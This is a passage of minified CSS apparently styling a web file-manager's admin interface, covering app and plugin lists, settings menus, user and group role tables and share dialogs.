rgba(0,0,0,0.2);font-size:12px;color:#fff;overflow:hidden;text-overflow:ellipsis;transform:rotate(45deg);}#body .main.app-content .app-list .app-li .text,body .main.app-content .app-list .app-li .text{height:50px;}#body .main.app-content .app-list .app-li .name,body .main.app-content .app-list .app-li .name{color:#444;font-weight:800;margin:10px 5px 0;max-height:32px;overflow:hidden;}#body .main.app-content .app-list .app-li .copyright,body .main.app-content .app-list .app-li .copyright{color:#aaa;max-height:32px;overflow:hidden;}#body .main.app-content .app-list .app-li .icon,body .main.app-content .app-list .app-li .icon{height:90px;background-color:rgba(0,0,0,0.01);}#body .main.app-content .app-list .app-li .icon img,body .main.app-content .app-list .app-li .icon img{max-width:100%;max-height:100%;width:72px;border-radius:10%;}#body .main.app-content .app-list .app-li .icon .content,body .main.app-content .app-list .app-li .icon .content{width:80px;height:80px;padding:10px;margin:0 auto;}#body .main.app-content .app-list .app-li .icon .content .font-icon,body .main.app-content .app-list .app-li .icon .content .font-icon{width:55px;height:55px;line-height:52px;font-size:40px;text-align:center;background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));padding:10px;margin-top:1px;display:inline-block;border-radius:12px;color:#fff;}#body .main.app-content .app-list .app-li .icon .content .font-icon.words,body .main.app-content .app-list .app-li .icon .content .font-icon.words{font-size:26px;font-weight:800;text-shadow:0 0 5px rgba(255,255,255,0.8);}#body .main.app-content .app-list .app-li .action i,body .main.app-content .app-list .app-li .action i{padding-right:0.3em;color:inherit;}#body .main.app-content .app-list .app-li .action .btn.btn-default i.font-icon,body .main.app-content .app-list .app-li .action .btn.btn-default i.font-icon{color:#999;}#body .main.app-content .app-list .app-li .action>.btn,body .main.app-content .app-list .app-li .action>.btn{float:none;width:80px;height:22px;height:22px\0;padding-left:0;padding-right:0;}#body .main.app-content .app-list .app-li .action .btn-default.dropdown-toggle,body .main.app-content .app-list .app-li .action .btn-default.dropdown-toggle{color:#aaa;}#body .main.app-content .app-list .app-li .action .dropdown-toggle,body .main.app-content .app-list .app-li .action .dropdown-toggle{width:25px;}#body .main.app-content .app-list .app-li .action .dropdown-menu,body .main.app-content .app-list .app-li .action .dropdown-menu{min-width:130px;text-align:left;margin-top:-1px;}#body .main.app-content .app-list .empty,body .main.app-content .app-list .empty{margin:50px auto;font-size:20px;color:#888;}#body .main.app-content .app-list .empty .icon,body .main.app-content .app-list .empty .icon{background:url("../../../images/file_icon/icon_others/appStore.png");width:120px;height:120px;margin:0 auto;margin-bottom:20px;background-size:cover;}#body .main.app-content .progress,body .main.app-content .progress{border-radius:0px;margin:0 auto;color:#42a3f1;font-size:12px;height:23px;background:none;border:none;box-shadow:none;}#body .main.app-content .progress .total-size,body .main.app-content .progress .total-size{position:absolute;left:5px;z-index:100;line-height:20px;}#body .main.app-content .progress .download-speed,body .main.app-content .progress .download-speed{position:absolute;right:4px;z-index:100;line-height:20px;}#body .main.app-content .progress .progress-bar,body .main.app-content .progress .progress-bar{position:absolute;left:0px;bottom:-1px;border-bottom:2px solid #2196F3;background:none;border-radius:3px;box-shadow:none;height:100%;background:rgba(33,150,243,0.2);animation:progress-bar-stripes 2s linear infinite;}#body .main.app-content.app-plugins .app-li .icon img,body .main.app-content.app-plugins .app-li .icon img{border-radius:0;box-shadow:none;border-radius:4px 4px 0 0;}#body .main.app-content.app-plugins .app-li .action .dropdown-toggle,body .main.app-content.app-plugins .app-li .action .dropdown-toggle{margin-left:-5px;}#body.plugin-page .app-menu-left .line,body.plugin-page .app-menu-left .line{margin:5px 10px 5px 20px;color:#6B95B2;padding:4px 6px;border-bottom:1px solid #EBF0F5;border-color:rgba(150,150,150,0.3);}#body.plugin-page .app-menu-left .search input,body.plugin-page .app-menu-left .search input{width:105px;height:25px;margin:10px 10px 10px 20px;padding-left:24px !important;}#body.plugin-page .app-menu-left .search .search-btn,body.plugin-page .app-menu-left .search .search-btn{position:absolute;width:25px;height:25px;line-height:25px;padding:0;color:#888;cursor:pointer;text-align:center;}#body.plugin-page .app-menu-left .search .search-btn:hover,body.plugin-page .app-menu-left .search .search-btn:hover{color:#444;}#body.plugin-page .app-menu-left .search .search-btn.btn-search,body.plugin-page .app-menu-left .search .search-btn.btn-search{top:11px;left:21px;height:27px;width:27px;}#body.plugin-page .app-menu-left .search .search-btn.btn-close,body.plugin-page .app-menu-left .search .search-btn.btn-close{left:128px;top:14px;width:20px;height:20px;line-height:20px;background:#eee;border-radius:50%;}#body.plugin-page .app-config .panel-body,body.plugin-page .app-config .panel-body{padding:20px 0;}#body.plugin-page .app-config .header,body.plugin-page .app-config .header{padding:0px 0 5px 0;border-bottom:1px solid #ddd;}#body.plugin-page .app-config .header .btn,body.plugin-page .app-config .header .btn{position:absolute;top:10px;}#body.plugin-page .app-config .header .name,body.plugin-page .app-config .header .name{color:#0086E5;font-size:18px;font-weight:800;text-align:center;}#body.plugin-page .app-descript .header,body.plugin-page .app-descript .header{padding:0px 0 5px 0;}#body.plugin-page .app-descript .header .btn,body.plugin-page .app-descript .header .btn{position:absolute;top:10px;}#body.plugin-page .app-descript .header .name,body.plugin-page .app-descript .header .name{color:#0086E5;font-size:18px;font-weight:800;text-align:center;margin-left:200px;}#body.plugin-page .app-descript h1,#body.plugin-page .app-descript h2,#body.plugin-page .app-descript h3,#body.plugin-page .app-descript h4,#body.plugin-page .app-descript h5,#body.plugin-page .app-descript .h1,#body.plugin-page .app-descript .h2,#body.plugin-page .app-descript .h3,#body.plugin-page .app-descript .h4,#body.plugin-page .app-descript .h5,body.plugin-page .app-descript h1,body.plugin-page .app-descript h2,body.plugin-page .app-descript h3,body.plugin-page .app-descript h4,body.plugin-page .app-descript h5,body.plugin-page .app-descript .h1,body.plugin-page .app-descript .h2,body.plugin-page .app-descript .h3,body.plugin-page .app-descript .h4,body.plugin-page .app-descript .h5{border-bottom:1px solid #ddd;padding:0.5em 0;}#body.plugin-page .app-descript .left-content,body.plugin-page .app-descript .left-content{position:absolute;left:20px;top:50px;width:150px;padding:15px;margin:0 0 20px 0;background:#fafdff;color:#888;border:1px solid #eee;}#body.plugin-page .app-descript .left-content .icon,body.plugin-page .app-descript .left-content .icon{height:90px;background-color:rgba(0,0,0,0.001);}#body.plugin-page .app-descript .left-content .icon img,body.plugin-page .app-descript .left-content .icon img{max-width:100%;max-height:100%;border-radius:10px;}#body.plugin-page .app-descript .left-content .icon .content,body.plugin-page .app-descript .left-content .icon .content{width:80px;height:80px;padding:10px;margin:0 auto;}#body.plugin-page .app-descript .left-content .icon .content .font-icon,body.plugin-page .app-descript .left-content .icon .content .font-icon{width:55px;height:55px;line-height:52px;font-size:40px;text-align:center;background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));padding:10px;margin-top:1px;display:inline-block;border-radius:12px;color:#fff;}#body.plugin-page .app-descript .left-content .icon .content .font-icon.words,body.plugin-page .app-descript .left-content .icon .content .font-icon.words{font-size:26px;font-weight:800;text-shadow:0 0 5px rgba(255,255,255,0.8);}#body.plugin-page .app-descript .left-content .btn,body.plugin-page .app-descript .left-content .btn{margin:10px 0 0;width:80px;}#body.plugin-page .app-descript .left-content .btn.dropdown-toggle,body.plugin-page .app-descript .left-content .btn.dropdown-toggle{width:20px;margin-left:-1px;}#body.plugin-page .app-descript .left-content .app-title,body.plugin-page .app-descript .left-content .app-title{text-align:center;color:#555;padding:15px 10px 0 10px;}#body.plugin-page .app-descript .left-content .line,body.plugin-page .app-descript .left-content .line{border-bottom:1px solid #eee;margin:10px 0;}#body.plugin-page .app-descript .left-content .title,body.plugin-page .app-descript .left-content .title{color:#444;font-weight:800;padding:10px 0 3px 15px;}#body.plugin-page .app-descript .left-content .p,body.plugin-page .app-descript .left-content .p{padding:0 0 0 15px;}#body.plugin-page .app-descript .right-content,body.plugin-page .app-descript .right-content{position:absolute;left:200px;right:20px;top:45px;}#body.plugin-page .app-descript .right-content .description,body.plugin-page .app-descript .right-content .description{padding:10px 0 20px 15px;line-height:1.6em;word-break:break-all;font-size:13px;}#body.plugin-page .app-descript .right-content .sliders,body.plugin-page .app-descript .right-content .sliders{margin:5px 0 30px 20px;padding:0;}#body.plugin-page .app-descript .right-content .carousel-indicators,body.plugin-page .app-descript .right-content .carousel-indicators{bottom:-40px !important;}#body.plugin-page .app-descript .right-content .carousel-indicators li,body.plugin-page .app-descript .right-content .carousel-indicators li{border-color:#ccc;}#body.plugin-page .app-descript .right-content .carousel-indicators .active,body.plugin-page .app-descript .right-content .carousel-indicators .active{background:#2196F3;border-color:#2865e2;background:linear-gradient(to right,#44abf6,#2865e2);}#body.plugin-page .app-descript .right-content .glyphicon,body.plugin-page .app-descript .right-content .glyphicon{font-size:50px;margin-top:-30px !important;border-radius:50%;}#body.plugin-page .app-descript .right-content .carousel-control,body.plugin-page .app-descript .right-content .carousel-control{background:rgba(0,0,0,0.001) !important;width:20%;}#body.plugin-page .app-descript .right-content .carousel-control:hover .glyphicon,body.plugin-page .app-descript .right-content .carousel-control:hover .glyphicon{background:rgba(0,0,0,0.3);}#body.plugin-page .app-descript .right-content .carousel-inner,body.plugin-page .app-descript .right-content .carousel-inner{width:100%;text-align:center;}#body.plugin-page .app-descript .right-content .carousel-inner .item,body.plugin-page .app-descript .right-content .carousel-inner .item{height:350px;line-height:350px;width:100%;}#body.plugin-page .app-descript .right-content .carousel-inner .item img,#body.plugin-page .app-descript .right-content .carousel-inner .item a img,body.plugin-page .app-descript .right-content .carousel-inner .item img,body.plugin-page .app-descript .right-content .carousel-inner .item a img{margin:0 auto;max-width:100%;max-height:100%;display:inline;box-shadow:0 1px 5px rgba(0,0,0,0.4);}#body.plugin-page .app-descript .progress,body.plugin-page .app-descript .progress{background:#def;margin:10px 0;position:relative;}#body.plugin-page .app-descript .progress .progress-bar,body.plugin-page .app-descript .progress .progress-bar{border-bottom:4px solid #2196F3;border-radius:0;}#body .randomImage,body .randomImage{width:25px;height:25px;margin-left:15px;cursor:pointer;}#body .main,body .main{position:absolute;left:18%;width:82%;height:93%;margin:30px 0 0 10px;}#body .main .h1 .font-icon,body .main .h1 .font-icon{padding-right:16px;}#body .main div.h1,body .main div.h1{font-weight:400;color:#666;padding-bottom:8px;margin:0;font-size:22px;}#body .main .savebox,body .main .savebox{border-top:1px solid #eee;margin-bottom:10px;}#body .main .savebox a.save,body .main .savebox a.save{margin-left:5px;margin-top:5px;padding:4px 20px;}#body .main .section .box,body .main .section .box{display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;margin-right:20px;}#body .main .section .box .flex-list,body .main .section .box .flex-list{float:left;width:140px;margin-right:10px;margin-bottom:0px;}#body .main .section .box .list,body .main .section .box .list{float:left;width:140px;height:115px;margin-right:10px;margin-bottom:15px;border:1px solid #ddd;background:#fff;cursor:pointer;border-radius:3px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}#body .main .section .box .list .ico,body .main .section .box .list .ico{width:120px;height:80px;margin:10px;text-align:center;}#body .main .section .box .list .theme,body .main .section .box .list .theme{margin:5px 10px;}#body .main .section .box .list .info,body .main .section .box .list .info{text-align:center;color:#666;margin:0px;margin-top:0px;font-size:1em;height:24px;line-height:24px;border-top:1px solid #eee;background:rgba(0,0,0,0.05);overflow:hidden;}#body .main .section .box .list .ico img,body .main .section .box .list .ico img{max-width:100%;height:100%;}#body .main .section .box .list.this,body .main .section .box .list.this{border:1px solid #63acff;background-color:#c9e2ff;}#body .main .section .box .list.this .info,body .main .section .box .list.this .info{color:#444;border-top:1px solid #c9e2ff;}#body .main .section .box .list.listhover,body .main .section .box .list.listhover{border:1px solid #63acff;}#body .main .section .content,body .main .section .content{word-break:break-all;color:#448;margin-bottom:20px;}#body .main .section .content h2,body .main .section .content h2{border-bottom:1px dashed #eef;padding-bottom:5px;margin-bottom:5px;font-weight:400;font-size:1.25em;}#body .main .section .content p,body .main .section .content p{margin-left:5px;text-indent:2em;margin-bottom:8px;color:#666;font-size:1em;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:100%;}#body .main .section .content .box,body .main .section .content .box{color:#555;clear:both;color:#666;}#body .main .section .content .box .title,body .main .section .content .box .title{color:#444;border-bottom:1px dashed #ddd;width:100%;font-size:21px;margin-bottom:10px;margin-top:10px;}#body .main .section .content .box .title span,body .main .section .content .box .title span{border-bottom:1px solid #aaa;display:inline-block;margin-bottom:-1px;text-align:center;padding:5px 10px;float:none;width:auto;}#body .main .section .content .box p,body .main .section .content .box p{line-height:1.7em;text-indent:2em;padding:3px;margin:0;}#body .main .section .content .box p b,body .main .section .content .box p b{padding-right:8px;}#body .main .section .content .box p i,body .main .section .content .box p i{padding-right:10px;}#body .main .nav,body .main .nav{margin-right:30px;border-bottom:2px solid #63acff;}#body .main .nav a,body .main .nav a{display:block;float:left;padding:5px 1.8em;background:#eee;border:none;margin:0;-webkit-transition:all 0.218s;-moz-transition:all 0.218s;-o-transition:all 0.218s;-ms-transition:all 0.218s;transition:all 0.218s;color:#666;}#body .main .nav a:hover,body .main .nav a:hover{background:#e1efff;border:none;color:#63acff;}#body .main .nav a.this,#body .main .nav a.this:hover,body .main .nav a.this,body .main .nav a.this:hover{background:#63acff;border:none;color:#fff;}#body .main .member input,body .main .member input{display:inline-block;width:45px;margin-left:2px;}#body .main .member span,body .main .member span{padding-left:10px;}#body .main .member select,body .main .member select{padding:3px 5px;font-family:"微软雅黑";color:#666;}#body .main .member .info,body .main .member .info{background:#efe;padding:6px 10px;color:#8a8;border:#ccc 1px dotted;margin-top:10px;}#body .main .member .edit-role,body .main .member .edit-role{color:#666;}#body .main .member .edit-role:hover,body .main .member .edit-role:hover{border-bottom:1px solid #666;}#body .main .together,body .main .together{margin-top:-1px;border-bottom:1px solid #eee;padding:5px 0 0 0px;width:100%;}#body .main .together .title,body .main .together .title{float:left;width:80px;height:28px;margin:5px;color:#333;}#body .main .together .title i,body .main .together .title i{padding-left:5px;font-style:normal;}#body .main .together span.text,body .main .together span.text{color:#bbb;font-size:1em;padding-left:10px;}#body .main .together.input input,body .main .together.input input{width:40%;margin-left:5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:26px;line-height:26px;}#body .main .together.input input:focus,body .main .together.input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}#body .main .group-editor .tag,body .main .group-editor .tag{height:27px;line-height:27px;margin:2px 4px;padding:0px 8px;text-decoration:none;color:#666;-webkit-transition:all 0.218s;-moz-transition:all 0.218s;-o-transition:all 0.218s;-ms-transition:all 0.218s;transition:all 0.218s;display:block;float:left;border:1px solid #eee;background:#fff;}#body .main .group-editor .tag input,body .main .group-editor .tag input{border:none;position:relative;top:-4px;display:inline-block;min-height:12px;margin-right:6px;}#body .main .group-editor .tag:hover,body .main .group-editor .tag:hover{color:#63acff;border-color:rgba(99,172,255,0.7);}#body .main .group-editor .tag.this,body .main .group-editor .tag.this{border-color:#63acff;color:#63acff;background:#ffffff;}#body .main .group-editor .tag span,body .main .group-editor .tag span{cursor:pointer;}#body .main .group-editor .together a.button,body .main .group-editor .together a.button{margin:0 0 0 10px;}#body .alert,body .alert{position:absolute;right:30px;left:0px;margin-top:10px;}#body .main .content .title span,body .main .content .title span{border-bottom:2px solid #bbb;}#body .main .panel,body .main .panel{margin-left:-1px;}#body .main .panel table .title,body .main .panel table .title{font-size:1.15em;}#body .main .panel table .button,body .main .panel table .button{margin-left:0px;}#body .main .panel table .title span,body .main .panel table .title span{border:none;}#body .main .panel table .menu-list .name input,body .main .panel table .menu-list .name input{width:90%;font-weight:400;}#body .main .panel table .menu-list .path input,body .main .panel table .menu-list .path input{width:90%;font-weight:400;}#body .menu-list,body .menu-list{color:#666;}#body .menu-list td span,body .menu-list td span{display:none;}#body .menu-list td label,body .menu-list td label{float:right;margin-right:8px;line-height:34px;padding-top:0px;}#body .menu-list td label input,body .menu-list td label input{margin-right:5px;}#body .menu-list td.url input[type=text],body .menu-list td.url input[type=text]{width:50% !important;float:left;margin-top:5px;}#body .menu-list td label span,body .menu-list td label span{display:inline-block;}#body .menu-system td input[type='text'],body .menu-system td input[type='text']{display:none !important;}#body .menu-system td span,body .menu-system td span{display:inline !important;}#body .menu-system .move-del,body .menu-system .move-del{display:none !important;}#body .menu-hidden,body .menu-hidden{opacity:0.5;}#body .setting-menu table tr td.url,body .setting-menu table tr td.url{line-height:30px;}#body .save,body .save{width:auto;}#body .main .select table a.button,body .main .select table a.button{padding:0 8px;}#body input[type="radio"],body input[type="radio"]{width:auto;border:none;}#body .setting-menu,body .setting-menu{margin-left:-1px;}#body .setting-tab table,body .setting-tab table{font-size:1em;color:#888;width:100%;margin:0px;border:none;border:1px solid #eee;margin:10px 0 0px 1px;}#body .setting-tab table tr,body .setting-tab table tr{border-bottom:1px solid #eee;background:#fff;height:30px;}#body .setting-tab table tr input[type='text'],body .setting-tab table tr input[type='text']{display:block;width:80%;color:#888;height:24px;}#body .setting-tab table tr.title,body .setting-tab table tr.title{background:#fff;color:#224;line-height:2.5em;height:2.5em;}#body .setting-tab table tr.title td,body .setting-tab table tr.title td{border-bottom:1px solid #eee;font-weight:800;}#body .setting-tab table tr.title span,body .setting-tab table tr.title span{color:#999;font-size:1em;padding-left:4px;font-weight:400;}#body .setting-tab table tr td,body .setting-tab table tr td{border-bottom:1px solid #eee;line-height:2.5em;height:2.5em;padding-left:3%;border-right:1px solid #eee;}#body .setting-tab table tr td.name,body .setting-tab table tr td.name{width:30%;}#body .setting-tab table tr td.name,#body .setting-tab table tr td.path,body .setting-tab table tr td.name,body .setting-tab table tr td.path{border-right:1px solid #eee;}#body .setting-tab table tr td.action,body .setting-tab table tr td.action{line-height:1.3em;}#body .setting-tab table tr td.action a,body .setting-tab table tr td.action a{margin-right:5px;}#body .setting-tab table tr td .font-icon,body .setting-tab table tr td .font-icon{padding-right:0em;color:#666;}#body a.add,body a.add{display:block;text-align:center;text-decoration:none;line-height:25px;height:25px;color:#444;box-shadow:none;border:1px solid #ddd;margin:-1px 0 20px 1px;background:#f3f3f3;}#body a.add:hover,body a.add:hover{background:#cde;}#body .create-app,body .create-app{margin:0;display:block;position:absolute;right:20px;margin-top:-5px;}#body .app-menu-left,body .app-menu-left{min-width:160px;width:160px;}#body .app-menu-left .setting li.selected,body .app-menu-left .setting li.selected{padding-left:12px;}body.setting-page a.font-icon-label{color:#698ebf;font-size:20px;width:35px;text-decoration:none;padding:0;display:inline-block;text-align:center;border-radius:3px;background:#E9F3F9;}body.setting-page a.font-icon-label:hover{background:#698ebf;color:#fff;}body.setting-page a.font-icon-label .font-icon{padding:0 !important;}body.setting-page .select-drop-menu.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle),body.setting-page .button-aciton-muti.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-radius:2px;}body.setting-page .select-drop-menu ul.dropdown-menu,body.setting-page .button-aciton-muti ul.dropdown-menu{border:1px solid rgba(0,0,0,0.15);box-shadow:0 4px 30px rgba(0,0,0,0.2);}body.setting-page .select-drop-menu ul.dropdown-menu li>a,body.setting-page .select-drop-menu ul.dropdown-menu li>a,body.setting-page .button-aciton-muti ul.dropdown-menu li>a,body.setting-page .button-aciton-muti ul.dropdown-menu li>a{font-size:13px;padding:3px 30px;color:#666;}body.setting-page .select-drop-menu ul.dropdown-menu li>a:focus,body.setting-page .select-drop-menu ul.dropdown-menu li>a:hover,body.setting-page .button-aciton-muti ul.dropdown-menu li>a:focus,body.setting-page .button-aciton-muti ul.dropdown-menu li>a:hover{background:#63acff;color:#fff;}body.setting-page .aui-title{font-size:1em;}body.setting-page .label-info{color:#698ebf;background:#E9F3F9;font-weight:400;font-style:12px;}.share-dialog .space-info-bar{margin:0 auto;margin-top:5px;}.share-dialog .label-default{background-color:#bbb;}.share-dialog .space-info-bar .space-process .space-process-use{background-color:#284b5a;}.share-dialog .select-drop-menu button.btn{width:150px;height:25px;}.share-dialog .select-drop-menu .selected{background-color:#def;}.share-dialog .select-parent-content .btn{width:140px;}.share-dialog .select-parent-content .icon-group{color:#FC913F;}.share-dialog .btn-default{background:#fefefe;background-image:none;filter:none;padding:2px 6px;}.share-dialog .dialog-group-display{width:270px;position:relative;left:90px;top:-33px;clear:both;margin-bottom:-20px;}.share-dialog .dialog-group-display .cell span.label{float:left;margin:4px 8px 4px 0;font-size:1em;cursor:default;}body.setting-page .ztree a{border:none;padding-left:3px;}body.setting-page .ztree a:hover{border:none;}body.setting-page .ztree li a.curSelectedNode{color:#fff;}body.setting-page .ztree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}body.setting-page .ztree .hover .sub-menu{display:inline-block;color:#666;}body.setting-page .ztree .curSelectedNode .sub-menu,body.setting-page .ztree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}textarea#name{width:157px;height:80px;border:1px solid #ddd;font-size:13px;border-radius:3px;outline:none;}textarea#name:focus{border-color:#75a1f0;box-shadow:0 0 4px #75a1f0;}body.setting-page .select-parent-content .ztree{position:absolute;left:90px;width:160px;margin-top:-2px;padding:0;z-index:100;background-color:#fff;border:1px solid #ccc;overflow-y:auto;height:250px;}body.setting-page .select-parent-content .ztree .sub-menu,body.setting-page .select-parent-content .ztree .curSelectedNode .sub-menu{opacity:0.01;filter:alpha(opacity=1);}#body .system-content{position:absolute;border:1px solid #ddd;box-shadow:0 0 5px #ddd;bottom:10px;right:30px;top:38px;left:0px;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}#body .system-content .group-title-span{text-decoration:none;color:#428bca;}#body .system-content .left-frame{position:absolute;bottom:0px;top:0px;overflow:auto;width:180px;background:#FEFEFF;border-right:1px solid #ddd;}#body .system-content .left-frame .left-header{position:fixed;}#body .system-content .left-frame .left-header .tab{width:90px;margin-left:-1px;text-align:center;float:left;height:30px;cursor:pointer;line-height:30px;border:1px solid #d2d2d2;border-top:none;border-right:none;background:#DAE9FD;}#body .system-content .left-frame .left-header .tab.this{border-color:1px solid #FEFEFF;border-bottom:none;color:#555;background:#FEFEFF;font-weight:800;}#body .system-content .left-frame .left-content{margin-top:35px;}#body .system-content .left-frame .left-content .role-box{padding:10px 10px;}#body .system-content .left-frame .left-content .role-box ul{list-style:none;}#body .system-content .left-frame .left-content .role-box ul li.role-cell{border-radius:3px;height:30px;line-height:30px;padding-left:20px;margin-bottom:3px;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}#body .system-content .left-frame .left-content .role-box ul li.role-cell.role-cell-add{text-align:center;background:#eee;padding:0;color:#666;}#body .system-content .left-frame .left-content .role-box ul li.role-cell:hover{background:#eee;}#body .system-content .left-frame .left-content .role-box ul li.role-cell.select,#body .system-content .left-frame .left-content .role-box ul li.role-cell.select.role-cell-add{background:#63acff;color:#fff;}#body .system-content .left-frame .left-content .role-box ul li.role-cell .sub-menu{float:right;line-height:30px;height:30px;width:30px;text-align:center;}#body .system-content .left-frame .left-content .ztree li a{border-radius:3px;}#body .system-content .left-frame .left-content .ztree li a.hover{border:1px solid #eee;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode,#body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover{color:#fff;}#body .system-content .left-frame .left-content .group-role-btn a{text-align:center;display:block;background:#def;margin:5px 10px;padding:15px 0;border-radius:2px;}#body .system-content .right-frame{position:absolute;bottom:0px;top:0px;left:175px;right:0px;overflow:auto;padding:10px 10px 10px 20px;}#body .system-content .right-frame .group-title{font-size:25px;padding:8px 0;}#body .system-content .right-frame .group-title .group-title-span{border-bottom:2px solid;padding-bottom:3px;}#body .system-content .right-frame .group-title .group-size{position:absolute;margin-left:10px;border-radius:2px;font-size:12px;background-color:#f6f6f6;margin-top:5px;padding:6px 10px 0px;}#body .system-content .right-frame .user-toolbar{background:#eee;border-radius:3px;padding:7px 0px;margin:10px 0px;}#body .system-content .right-frame .user-toolbar .dropdown-menu{min-width:100px;}#body .system-content .right-frame .user-list table{border:none;width:100%;border-top:1px solid #ddd;border-bottom:1px solid #ddd;}#body .system-content .right-frame .user-list table tr{background:#fff;border:none;border-bottom:1px solid #eee;color:#666;}#body .system-content .right-frame .user-list table tr.title,#body .system-content .right-frame .user-list table tr.title:hover{background:#fafafa;border-top:1px solid #ddd;font-size:1em;color:#666;}#body .system-content .right-frame .user-list table tr:hover,#body .system-content .right-frame .user-list table tr.selected{background:#fff9ed;cursor:default;}#body .system-content .right-frame .user-list table tr.unuse{opacity:0.3;filter:alpha(opacity=30);}#body .system-content .right-frame .user-list table tr td{height:30px;line-height:30px;padding:0;border-right:none;width:auto;}#body .system-content .right-frame .user-list table tr td .space-info-bar{height:25px;}#body .system-content .right-frame .user-list table tr td .space-process{margin-top:6px;margin-bottom:-6px;}#body .system-content .right-frame .user-list table tr td .space-info{width:110px;overflow:hidden;}#body .system-content .right-frame .user-list table tr td.select{width:30px;padding-left:10px;}#body .system-content .right-frame .user-list table tr td.select input{position:relative;}#body .system-content .right-frame .user-list table tr td.select input:focus{box-shadow:none;}#body .system-content .right-frame .user-list table tr td.select:hover{background:#f6f6f6;}#body .system-content .right-frame .user-list table tr td.name{min-width:95px;}#body .system-content .right-frame .user-list table tr td.name a{border-bottom:1px solid;padding:2px;}#body .system-content .right-frame .user-list table tr td.role{width:90px;}#body .system-content .right-frame .user-list table tr td.space{width:120px;}#body .system-content .right-frame .user-list table tr td.group{width:auto;}#body .system-content .right-frame .user-list table tr td.action{width:auto;}#body .system-content .right-frame .user-list table tr td .label-small{font-size:10px;font-style:italic;color:#698ebf;background:#E9F3F9;padding:1px;border-radius:2px;}body.setting-page .select-user-group{padding:20px;font-size:1em;}body.setting-page .select-user-group .title-info .title{display:block;width:210px;float:left;padding-bottom:10px;}body.setting-page .select-user-group .title-info .title-right{margin-left:50px;}body.setting-page .select-user-group .right-content,body.setting-page .select-user-group .center-action,body.setting-page .select-user-group .left-content{border:1px solid #eee;float:left;width:235px;height:300px;}body.setting-page .select-user-group .right-content,body.setting-page .select-user-group .left-content{overflow-y:auto;}body.setting-page .select-user-group .left-content{margin:0px !important;padding:0;}body.setting-page .select-user-group .center-action{width:25px;border:none;}body.setting-page .select-user-group .center-action i{width:30px;height:30px;display:block;margin-top:150px;font-size:22px;color:#999;text-align:center;}body.setting-page .select-user-group .select-group-right{padding:0;list-style:none;}body.setting-page .select-user-group .select-group-right .group-self{height:30px;line-height:30px;border-radius:2px;}body.setting-page .select-user-group .select-group-right .group-self:hover{background:#def;}body.setting-page .select-user-group .select-group-right .group-self .title{color:#1e5494;padding-left:5px;}body.setting-page .select-user-group .select-group-right .group-self .icon-group{padding-right:10px;}body.setting-page .select-user-group .select-group-right .group-self .remove{float:right;cursor:pointer;height:30px;line-height:30px;width:22px;font-size:1.25em;text-align:center;color:#aaa;}body.setting-page .select-user-group .select-group-right .group-self .remove:hover{color:#f33;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li{padding-left:1em;font-size:13px;height:26px;line-height:24px;cursor:pointer;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li.selected{background:#337ab7;color:#fff;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li.selected:hover{background:#337ab7;color:#fff;}body.setting-page .select-user-group .select-group-right .select-drop-menu .dropdown-menu li:hover{background:#def;color:#337ab7;}body.setting-page .select-user-group #user-group-select.ztree .group-select-box{color:#fff;font-size:12px;border-radius:2px;width:14px;height:14px;line-height:14px;text-align:center;margin-top:4px;margin-right:4px;padding:0;position:absolute;right:0px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}body.setting-page .select-user-group #user-group-select.ztree .group-select-box:before{content:"\f";}body.setting-page .select-user-group #user-group-select.ztree a:hover .group-select-box{border:1px solid #3B99FC;}body.setting-page .select-user-group #user-group-select.ztree a.this .group-select-box{border:1px solid #3B99FC;background:#3B99FC;}body.setting-page .select-user-group #user-group-select.ztree a.this .group-select-box:before{content:"\f00c";color:#fff;}body.setting-page .select-user-group .select-drop-menu{margin-top:2px;float:right;}body.setting-page .select-user-group .select-drop-menu .btn{padding:0px 0.5em;margin-top:3px;font-weight:400;}body .group-role-setting{position:relative;width:100%;height:100%;}body .group-role-setting .content-info{position:absolute;bottom:10px;right:10px;top:10px;left:10px;box-shadow:0 0 3px #ccc;border-radius:2px;}body .group-role-setting .form-row{margin-bottom:5px;width:100%;}body .group-role-setting .form-row:after{clear:both;}body .group-role-setting .form-row.line{border-bottom:1px solid #ddd;margin-bottom:5px;}body .group-role-setting .form-row label{margin-right:20px;}body .group-role-setting .form-row input[type='checkbox']{display:inline-block;width:20px !important;}body .group-role-setting .form-row input[type='text'],body .group-role-setting .form-row input[type='password']{display:inline-block;margin-right:10px;height:30px;width:150px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;color:#444;border-radius:3px;padding-left:10px;}body .group-role-setting .form-row input[type='text']:focus,body .group-role-setting .form-row 